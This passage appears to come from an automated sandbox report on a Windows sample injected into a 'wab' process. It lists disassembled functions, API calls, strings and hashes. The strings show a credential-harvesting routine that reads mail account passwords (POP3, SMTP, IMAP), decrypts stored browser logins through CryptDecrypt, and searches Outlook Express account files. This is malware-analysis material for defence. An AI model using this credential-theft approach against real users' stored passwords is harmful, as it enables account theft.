                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 889583718-2036018995
                                • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                APIs
                                • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                • LockResource.KERNEL32(00000000), ref: 00410CA1
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                APIs
                                • memset.MSVCRT ref: 004109F7
                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                  • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                • memset.MSVCRT ref: 00410A32
                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                • String ID:
                                • API String ID: 3143880245-0
                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                APIs
                                  • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CreateFontIndirect_mbscpymemset
                                • String ID: Arial
                                • API String ID: 3853255127-493054409
                                • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                APIs
                                  • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                  • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                • _strcmpi.MSVCRT ref: 0040CEC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$_strcmpimemset
                                • String ID: /stext
                                • API String ID: 520177685-3817206916
                                • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                APIs
                                • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                APIs
                                  • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID:
                                • API String ID: 145871493-0
                                • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                APIs
                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                  • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                  • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                  • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itoamemset
                                • String ID:
                                • API String ID: 4165544737-0
                                • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                APIs
                                • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                APIs
                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                APIs
                                • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                APIs
                                • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                APIs
                                • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                APIs
                                • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                APIs
                                • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                • API String ID: 2238633743-192783356
                                • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileString_mbscmpstrlen
                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                • API String ID: 3963849919-1658304561
                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID: (yE$(yE$(yE
                                • API String ID: 1865533344-362086290
                                • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                APIs
                                • memset.MSVCRT ref: 0040EBD8
                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                • memset.MSVCRT ref: 0040EC2B
                                • memset.MSVCRT ref: 0040EC47
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                • memset.MSVCRT ref: 0040ECDD
                                • memset.MSVCRT ref: 0040ECF2
                                • _mbscpy.MSVCRT ref: 0040ED59
                                • _mbscpy.MSVCRT ref: 0040ED6F
                                • _mbscpy.MSVCRT ref: 0040ED85
                                • _mbscpy.MSVCRT ref: 0040ED9B
                                • _mbscpy.MSVCRT ref: 0040EDB1
                                • _mbscpy.MSVCRT ref: 0040EDC7
                                • memset.MSVCRT ref: 0040EDE1
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                • API String ID: 3137614212-1455797042
                                • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                APIs
                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                • memset.MSVCRT ref: 0040E5B8
                                • memset.MSVCRT ref: 0040E5CD
                                • _mbscpy.MSVCRT ref: 0040E634
                                • _mbscpy.MSVCRT ref: 0040E64A
                                • _mbscpy.MSVCRT ref: 0040E660
                                • _mbscpy.MSVCRT ref: 0040E676
                                • _mbscpy.MSVCRT ref: 0040E68C
                                • _mbscpy.MSVCRT ref: 0040E69F
                                • memset.MSVCRT ref: 0040E6B5
                                • memset.MSVCRT ref: 0040E6CC
                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                • memset.MSVCRT ref: 0040E736
                                • memset.MSVCRT ref: 0040E74F
                                • sprintf.MSVCRT ref: 0040E76D
                                • sprintf.MSVCRT ref: 0040E788
                                • _strcmpi.MSVCRT ref: 0040E79E
                                • _strcmpi.MSVCRT ref: 0040E7B7
                                • _strcmpi.MSVCRT ref: 0040E7D3
                                • memset.MSVCRT ref: 0040E858
                                • sprintf.MSVCRT ref: 0040E873
                                • _strcmpi.MSVCRT ref: 0040E889
                                • _strcmpi.MSVCRT ref: 0040E8A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                • API String ID: 4171719235-3943159138
                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                • GetWindowRect.USER32(?,?), ref: 00410487
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                • GetDC.USER32 ref: 004104E2
                                • strlen.MSVCRT ref: 00410522
                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                • ReleaseDC.USER32(?,?), ref: 00410580
                                • sprintf.MSVCRT ref: 00410640
                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                • GetClientRect.USER32(?,?), ref: 004106DD
                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                • GetClientRect.USER32(?,?), ref: 00410737
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 1703216249-3046471546
                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                APIs
                                • memset.MSVCRT ref: 004024F5
